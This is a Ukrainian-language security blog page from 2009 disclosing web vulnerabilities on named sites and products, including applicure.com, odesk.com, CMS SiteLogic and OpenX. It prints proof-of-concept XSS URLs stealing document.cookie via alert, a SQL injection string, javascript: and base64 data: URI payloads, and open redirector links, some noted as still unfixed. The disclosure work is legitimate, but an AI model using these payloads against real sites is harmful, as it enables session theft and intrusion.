Уразливість на moemesto.ru
23:56 14.10.2009У лютому, 16.02.2009, я знайшов Cross-Site Scripting уразливість на проекті http://moemesto.ru (це сервіс онлайн закладок). Про що найближчим часом сповіщу адміністрацію проекту.
XSS:
У лютому, 16.02.2009, я знайшов Cross-Site Scripting уразливість на проекті http://moemesto.ru (це сервіс онлайн закладок). Про що найближчим часом сповіщу адміністрацію проекту.
XSS:
В даній добірці уразливості в веб додатках:
17.06.2009
У квітні, 10.04.2008, я знайшов Insufficient Anti-automation, Cross-Site Scripting та SQL Injection уразливості, а 13.06.2009 ще Information Leakage уразливість на http://www.applicure.com - сайті секюріті компанії Applicure, виробника WAF DotDefender. Про що найближчим часом сповіщу адміністрацію сайта.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
12.10.2009
Insufficient Anti-automation:
http://www.applicure.com/?page=monitorRegister
У формі був відсутній захист від автоматизованих запитів (капча).
XSS:
http://www.applicure.com/unMail.php?e=%3Cscript%3Ealert(document.cookie)%3C/script%3E
SQL Injection:
http://www.applicure.com/unMail.php?e=’%20or%201=’1
Information Leakage:
http://www.applicure.com/CHANGELOG.txt
Попередні уразливості були виправлені шляхом заміни движка на Drupal. А остання уразливість так досі й не була виправлена.
У січні, 16.01.2009, я знайшов Cross-Site Scripting уразливість, а 06.04.2009 ще Command Execution уразливість в CMS SiteLogic. Це українська комерційна CMS. Уразливості виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в CMS SiteLogic.
XSS:
http://site/?mid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Command Execution:
Можливе завантаження довільних файлів (shell upload) через модуль “Банерна система” в адмінці.
В даній добірці уразливості в веб додатках:
В даній добірці уразливості в веб додатках:
16.07.2009
У листопаді, 11.11.2008, я знайшов Cross-Site Scripting, Insufficient Anti-automation та Abuse of Functionality уразливості на проекті http://www.odesk.com. Про що найближчим часом сповіщу адміністрацію проекту.
Раніше я вже писав про уразливості на www.odesk.com.
Детальна інформація про уразливості з’явиться пізніше.
07.10.2009
XSS (IE):
POST запит на сторінці https://www.odesk.com/ticket.php
" style="xss:expression(alert(document.cookie))"В полях: Name, oDesk Username, Email.
Insufficient Anti-automation:
https://www.odesk.com/ticket.php
https://www.odesk.com/ticket.php?key=~~1472bcfe1c8803e1
На даних формах немає захисту від автоматизованих запитів (капчі).
Abuse of Functionality:
https://www.odesk.com/ticket.php
https://www.odesk.com/ticket.php?key=~~1472bcfe1c8803e1
Враховуючи те, що з даних форм емайл відправляється також на заданий емайл користувача, то окрім розсилання спаму власникам сайта, також можна розсилати спам на довільні емайли.
Дані уразливості досі не виправлені.
В даній добірці уразливості в веб додатках:
У лютому, 08.02.2009, я знайшов Cross-Site Scripting уразливість на сайті http://webfile.ru (файлообмінник). Про що найближчим часом сповіщу адміністрацію сайта.
XSS:
01.08.2009
У червні, 04.06.2009, я знайшов Denial of Service, Cross-Site Scripting та Redirector уразливості в OpenX (дану Redirector уразливість я зустрічав на сайтах ще в 2008 році). Це популярна локальна банерна система, що раніше називалася Openads. Про що найближчим часом повідомлю розробникам системи.
Раніше я вже писав про уразливості в OpenX.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.
03.10.2009
DoS (Looped DoS):
http://site/adclick.php
Уразливі вірогідно лише всі версії Openads.
XSS:
http://site/adclick.php?maxdest=javascript:alert(document.cookie)
http://site/adclick.php?dest=javascript:alert(document.cookie)
Працює в Mozilla, Firefox (до версії 3.0.9), IE6, Opera та Google Chrome. Уразливі вірогідно лише всі версії Openads, де використовується заголовок Refresh. В нових версіях (таких як OpenX v2.6.3) використовується заголовок Location і там можлива атака в браузерах Firefox та Opera.
http://site/adclick.php?dest=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b
Інший редиректор, про який я вже писав, також уразливий для цієї атаки:
http://site/www/delivery/ck.php?dest=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b
Redirector:
http://site/adclick.php?maxdest=http://websecurity.com.ua
http://site/adclick.php?dest=http://websecurity.com.ua
Уразливі OpenX v2.6.3 та попередні версії та потенційно наступні версії (та всі версії Openads). А до Redirector уразливі всі версії системи - OpenX v2.8.1 та попередні версії.